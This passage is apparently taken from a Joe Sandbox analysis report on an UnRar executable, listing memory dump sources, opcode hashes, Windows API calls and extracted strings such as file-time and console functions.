                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 1017591355-0
                                                            • Opcode ID: 8a617dc65c3a6367b1ba8896404b003ad5505829be8874ca3c7e97686f953a6a
                                                            • Instruction ID: b3343281c122c6d30f8fb931d9ff4a239eda5a6e4d3754ca24b5b6f4a7d9eede
                                                            • Opcode Fuzzy Hash: 8a617dc65c3a6367b1ba8896404b003ad5505829be8874ca3c7e97686f953a6a
                                                            • Instruction Fuzzy Hash: A7711311E0F747D1FAA0BB2D941427AD191AF41BD8FD652B5DA5E026E6EF2CF4438320
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 28cdd1cac15c1c2b2517891e2cd9340e38c7cd85bd6d5c6e55f9315787835c10
                                                            • Instruction ID: 7fcd59db83b79ea361173ed7bd1e9b2bd9eb83e8fe14c14ffd46ad9b5b62a437
                                                            • Opcode Fuzzy Hash: 28cdd1cac15c1c2b2517891e2cd9340e38c7cd85bd6d5c6e55f9315787835c10
                                                            • Instruction Fuzzy Hash: B251F473A15691C7EB28EF25C44027CF7A1EB94B94F568125DA4D17B98CA3CE842C7A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \033'
                                                            • API String ID: 0-3165038308
                                                            • Opcode ID: a21ca1895fac5241b577f2dd5a6186eb1309d44fa168ced7e619001d5325b00a
                                                            • Instruction ID: 26413650456918853589b4eef4eef2bc5f7e2ddbbcf2a8f3456d1910a6eb5639
                                                            • Opcode Fuzzy Hash: a21ca1895fac5241b577f2dd5a6186eb1309d44fa168ced7e619001d5325b00a
                                                            • Instruction Fuzzy Hash: 53C18B77B282908FE350CF7AE400AAD7BB1F39878CB515125DF59A3B09D639D645CB40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: 0
                                                            • API String ID: 3215553584-4108050209
                                                            • Opcode ID: a92ec3dae37c4c5c2554c1b97b83007307ca6b98fb5db20cc79a3f2c944c64b7
                                                            • Instruction ID: b9dd70bc8c0395c574a74e1e2b2bc47d7d3c98f26986f74541c3939b76acedfe
                                                            • Opcode Fuzzy Hash: a92ec3dae37c4c5c2554c1b97b83007307ca6b98fb5db20cc79a3f2c944c64b7
                                                            • Instruction Fuzzy Hash: 6881F723A1A703C7FEA4AE25846057DA390EF41744FD615B1DD0A876B5CF2DEA47C720
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: 0
                                                            • API String ID: 3215553584-4108050209
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            APIs
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            Similarity
                                                            • API ID: AddressProc$Caller
                                                            • String ID:
                                                            • API String ID: 4202421803-0
                                                            • Opcode ID: d6676e15368fd54f2f91a13e45b2c6e8269c9b65125dc00fe05b60ff74e2d372
                                                            • Instruction ID: d7b40bc30a37e3bcec5a3e437ee89460525b4b83526e9e711230e3b99c894dc3
                                                            • Opcode Fuzzy Hash: d6676e15368fd54f2f91a13e45b2c6e8269c9b65125dc00fe05b60ff74e2d372
                                                            • Instruction Fuzzy Hash: 9A91EF23A09AC196FB11EF28D4006EDA720FB95788F451231EF4E53B69EF39E646C350
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba8e014b270dd00ed32f7015d92350f5a7e0cbbde35655a4e3af8aac88918557
                                                            • Instruction ID: e4deb02e37b728d5158c335b9d8954405b59bdae6233acc68efa4de7af70dd2f
                                                            • Opcode Fuzzy Hash: ba8e014b270dd00ed32f7015d92350f5a7e0cbbde35655a4e3af8aac88918557
                                                            • Instruction Fuzzy Hash: 79916432625542DBE7189F2886544ECB6A2F754310FD94339DB09CBAA9C73AF532CB60
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                            • API String ID: 3668304517-727060406
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                            • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                            • API String ID: 2565136772-3242537097
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %ls$%ls%ls%ls$%s$ $ $ $ $%s $%s: %s
                                                            • API String ID: 0-2654841397
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                            • API String ID: 3215553584-2617248754
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 4097890229-253988292
                                                            Similarity
                                                            • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 2940173790-393685449
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID: .rar$exe$rar$rar$sfx
                                                            • API String ID: 3668304517-3472988566
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7AACF5FF3,?,?,?,00007FF7AACF3D5E,?,?,?,00007FF7AACF3D19), ref: 00007FF7AACF5E71
                                                            • GetLastError.KERNEL32(?,?,00000000,00007FF7AACF5FF3,?,?,?,00007FF7AACF3D5E,?,?,?,00007FF7AACF3D19), ref: 00007FF7AACF5E7F
                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7AACF5FF3,?,?,?,00007FF7AACF3D5E,?,?,?,00007FF7AACF3D19), ref: 00007FF7AACF5EA9
                                                            • FreeLibrary.KERNEL32(?,?,00000000,00007FF7AACF5FF3,?,?,?,00007FF7AACF3D5E,?,?,?,00007FF7AACF3D19), ref: 00007FF7AACF5EEF
                                                            • GetProcAddress.KERNEL32(?,?,00000000,00007FF7AACF5FF3,?,?,?,00007FF7AACF3D5E,?,?,?,00007FF7AACF3D19), ref: 00007FF7AACF5EFB
                                                            Similarity
                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                            • String ID: api-ms-
                                                            • API String ID: 2559590344-2084034818
                                                            Similarity
                                                            • API ID: CloseCreateEventHandle$ErrorLast
                                                            • String ID: rar -ioff
                                                            • API String ID: 4151682896-4089728129
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                            • API String ID: 667068680-1824683568
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                            • String ID:
                                                            • API String ID: 4097890229-0
                                                            Similarity
                                                            • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                            • String ID: *.*
                                                            • API String ID: 73155330-438819550
                                                            Similarity
                                                            • API ID: LoadStringfflush
                                                            • String ID:
                                                            • API String ID: 2360701518-0
                                                            APIs
                                                              • Part of subcall function 00007FF7AACCE08C: GetVersionExW.KERNEL32 ref: 00007FF7AACCE0BD
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACB59BF), ref: 00007FF7AACE2E5C
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACB59BF), ref: 00007FF7AACE2E68
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACB59BF), ref: 00007FF7AACE2E78
                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACB59BF), ref: 00007FF7AACE2E86
                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACB59BF), ref: 00007FF7AACE2E94
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACB59BF), ref: 00007FF7AACE2ED5
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            APIs
                                                              • Part of subcall function 00007FF7AACDB3AC: LoadStringW.USER32 ref: 00007FF7AACDB433
                                                              • Part of subcall function 00007FF7AACDB3AC: LoadStringW.USER32 ref: 00007FF7AACDB44C
                                                            • GetStdHandle.KERNEL32(?,?,?,?,?,?,00000000,00000002,?,00007FF7AACBD6F7), ref: 00007FF7AACBDA5D
                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,00000002,?,00007FF7AACBD6F7), ref: 00007FF7AACBDA6D
                                                            • SetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,00000002,?,00007FF7AACBD6F7), ref: 00007FF7AACBDA7B
                                                            • ReadConsoleW.KERNEL32(?,?,?,?,?,?,00000000,00000002,?,00007FF7AACBD6F7), ref: 00007FF7AACBDABC
                                                            • SetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,00000002,?,00007FF7AACBD6F7), ref: 00007FF7AACBDB03
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACBDB5A
                                                            Similarity
                                                            • API ID: Console$Mode$LoadString$HandleRead_invalid_parameter_noinfo_noreturnfflush
                                                            • String ID:
                                                            • API String ID: 1376255533-0
                                                            • Opcode ID: 485f5aca465dc1c45fc577ef5baa878c6cd38b458f01b5dfa9662c5db8524c87
                                                            • Instruction ID: 95a8b000d9a19473cf0103c56fe1bff0b8c3e1a8338cd2762484715c5206e178
                                                            • Opcode Fuzzy Hash: 485f5aca465dc1c45fc577ef5baa878c6cd38b458f01b5dfa9662c5db8524c87
                                                            • Instruction Fuzzy Hash: D031D562F16B42C5FA04AB74D8402BDA321FB45BE4F915271DA6D17BE9DE2CD4428320
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: b96f54fb1a7695cbdf6d461085c094cfc7a5ba12654ace23538fa012d1f063ce
                                                            • Instruction ID: 9d94cb2aa091e3d196ca4277fb5890ccce7127b4163f85c53c1adb4f5ce1a4db
                                                            • Opcode Fuzzy Hash: b96f54fb1a7695cbdf6d461085c094cfc7a5ba12654ace23538fa012d1f063ce
                                                            • Instruction Fuzzy Hash: EB313662B11A51CDFB10DFB5E8901AC7770FB18748B95503AEE4EA7A68EF38D486C710
                                                            APIs
                                                              • Part of subcall function 00007FF7AACE31D0: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,00007FF7AACCB965), ref: 00007FF7AACE31ED
                                                              • Part of subcall function 00007FF7AACE31D0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,00007FF7AACCB965), ref: 00007FF7AACE31FD
                                                            • GetCurrentProcessId.KERNEL32 ref: 00007FF7AACCB98C
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACCBC3F
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACCBC45
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACCBC4B
                                                            Strings
                                                            Similarity
                                                            • API ID: Time_invalid_parameter_noinfo_noreturn$System$CurrentFileProcess
                                                            • String ID: .rartemp
                                                            • API String ID: 3219218510-2558811017
                                                            • Opcode ID: d068138b5db6aa7c1a4083ee3f74bf3e71170de5e274bfcbafdce862f0090949
                                                            • Instruction ID: bf1ef967fa7853adfe5cd798c4eb0820e58e930d525815afe764144e99c13800
                                                            • Opcode Fuzzy Hash: d068138b5db6aa7c1a4083ee3f74bf3e71170de5e274bfcbafdce862f0090949
                                                            • Instruction Fuzzy Hash: 9591F722B19B81C2FB00EF65D4542ACA321FB84798F815275EE6D17BEADF38E546C350
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: abort$CallEncodePointerTranslator
                                                            • String ID: MOC$RCC
                                                            • API String ID: 2889003569-2084237596
                                                            • Opcode ID: d07774bda2da0d2cead86fb449f3fb2321784c544e5a3542296f2cd9fd032fa5
                                                            • Instruction ID: 1a1c4e90d91a051d3429405175afdc6f8e31f01dc29d6a011210b55eb71ae421
                                                            • Opcode Fuzzy Hash: d07774bda2da0d2cead86fb449f3fb2321784c544e5a3542296f2cd9fd032fa5
                                                            • Instruction Fuzzy Hash: 5091A173A09782CAF710EB64E5902ADBBA0F744788F51812AEF4D57B65DF38D196C700
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                            • String ID: csm$f
                                                            • API String ID: 2395640692-629598281
                                                            • Opcode ID: c04960aa3651e31c4b9b0b4a6cdd2ad6bbc945868174b6cb73cdb9ce17a3e8b6
                                                            • Instruction ID: a0acccf332f4cba0441d5227d0921b2ea66a778a0534e3e92d2508bf066a7a1e
                                                            • Opcode Fuzzy Hash: c04960aa3651e31c4b9b0b4a6cdd2ad6bbc945868174b6cb73cdb9ce17a3e8b6
                                                            • Instruction Fuzzy Hash: 0751C433A0B703E6FB58EF11E464A2DB755FB40B84F928174DA6A47758DF38E8429720
                                                            APIs
                                                              • Part of subcall function 00007FF7AACE2DF4: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACB59BF), ref: 00007FF7AACE2E5C
                                                              • Part of subcall function 00007FF7AACE2DF4: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACB59BF), ref: 00007FF7AACE2ED5
                                                            • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7AACE302A
                                                            • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7AACE3054
                                                            Strings
                                                            Similarity
                                                            • API ID: Time$File$swprintf$LocalSystem
                                                            • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                            • API String ID: 1364621626-1794493780
                                                            • Opcode ID: 7d321ce817a0fdfb4af718e0bf1384aa42d63e94d5cefef4cfe5cba91e79b1c5
                                                            • Instruction ID: 97cd33b56e4598433b406038a206639d966d75d4fdec69da964dbb14828d1518
                                                            • Opcode Fuzzy Hash: 7d321ce817a0fdfb4af718e0bf1384aa42d63e94d5cefef4cfe5cba91e79b1c5
                                                            • Instruction Fuzzy Hash: 9321F776A19241CEF760DF68D48069DB7F0F758794F554072EE8893B58DB38E8428B20
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 2d0d250f74f57a742152c82858035fa5105717beccfc49530fec0c377f5d23f2
                                                            • Instruction ID: c5411afdc69a3ea31a7c110b080193d1bec576312b76e76eec5fe8da56d6c348
                                                            • Opcode Fuzzy Hash: 2d0d250f74f57a742152c82858035fa5105717beccfc49530fec0c377f5d23f2
                                                            • Instruction Fuzzy Hash: F3F04422A1A743C1FF44AB51F45427DA360EF88790F895076D99F46678DE3CD48AC720
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c65ad87da13dbd93674f671d60f6032d5c92e5445ebbcbbc346fb95e79a7d944
                                                            • Instruction ID: b48b2055dee1f4e6cce2f35c63018c7179e3c6aedb5912c64bf19bd090a130bb
                                                            • Opcode Fuzzy Hash: c65ad87da13dbd93674f671d60f6032d5c92e5445ebbcbbc346fb95e79a7d944
                                                            • Instruction Fuzzy Hash: 9CA1CA63A0A782C5FB616B618400379E691FF40794F864679E9BE077E9DF7CD4468320
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: f573e83584cf72eb415a34c9f22b8e2aa7d20a919c3fa1a7db8c1d7476fd232a
                                                            • Instruction ID: 774f171254b6272e17b8ea5e3c6b8081ca834150d5b07f504376a2948051b104
                                                            • Opcode Fuzzy Hash: f573e83584cf72eb415a34c9f22b8e2aa7d20a919c3fa1a7db8c1d7476fd232a
                                                            • Instruction Fuzzy Hash: 1D81B023F1A713C5F721AB6994606BDA6A0FB44B98F8241B5DE5E136B5CF3CA447C320
                                                            APIs
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 2398171386-0
                                                            • Opcode ID: 1e5b648cc94bc06b6c9c8e6cf288b4a1f9d9ea443d3d2fc03fe58bfb1a1b5c5f
                                                            • Instruction ID: 4837edcb1ae41e79b716c679b433aa803715f0afe2a7ecb7c95372739bef6fba
                                                            • Opcode Fuzzy Hash: 1e5b648cc94bc06b6c9c8e6cf288b4a1f9d9ea443d3d2fc03fe58bfb1a1b5c5f
                                                            • Instruction Fuzzy Hash: 5851E622F09B42D9FB50EFB5E4003BDA361AB487A8F815275DE6D56BE9DF3894068310
                                                            APIs
                                                            Similarity
                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 3659116390-0
                                                            • Opcode ID: 67fea674869eec2a6b8490499bd49159970c66f08a9e76a5dfafc3bf99adbe2f
                                                            • Instruction ID: 53e5db98743fa5d7c81b916cdf4f756539e6ae1e7cb76d2eee4924f2e7162ee9
                                                            • Opcode Fuzzy Hash: 67fea674869eec2a6b8490499bd49159970c66f08a9e76a5dfafc3bf99adbe2f
                                                            • Instruction Fuzzy Hash: F251DF33A15A52CAF711DB29E4543ACBBB0FB44B98F458135DE5E47AA8DF38E142C320
                                                            APIs
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 262959230-0
                                                            • Opcode ID: 8bd564df447ac30776a41a00c7d2a18e3a8f4c3023ad317272d14ef43eaa7163
                                                            • Instruction ID: c2ea85d9c3c828e2b004d54d7f4a74e23a9ff563c78b71018833e0081d0b703b
                                                            • Opcode Fuzzy Hash: 8bd564df447ac30776a41a00c7d2a18e3a8f4c3023ad317272d14ef43eaa7163
                                                            • Instruction Fuzzy Hash: 2141B422A0A747D9FB54AF3198203BDA290FF04FA4F954674D96E577E9EE3CD4428320
                                                            APIs
                                                            Similarity
                                                            • API ID: FileSecurity_invalid_parameter_noinfo_noreturn$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1551570265-0
                                                            • Opcode ID: 0f984b96265fa5fff78f9baae8d59a95fa6a10874d8cd24b4bec1609ccf30dd6
                                                            • Instruction ID: 5e6d3b94cfff6412c872cd7c75e4b2567520c28acb23947de7c14bcde6dbc0c8
                                                            • Opcode Fuzzy Hash: 0f984b96265fa5fff78f9baae8d59a95fa6a10874d8cd24b4bec1609ccf30dd6
                                                            • Instruction Fuzzy Hash: 1C51B162F16752C5FB00FB65D4816BDA361EB447A4F8211B1DE5D23AA9EF38E487C320
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmp
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmp
                                                            Joe Sandbox IDA Plugin
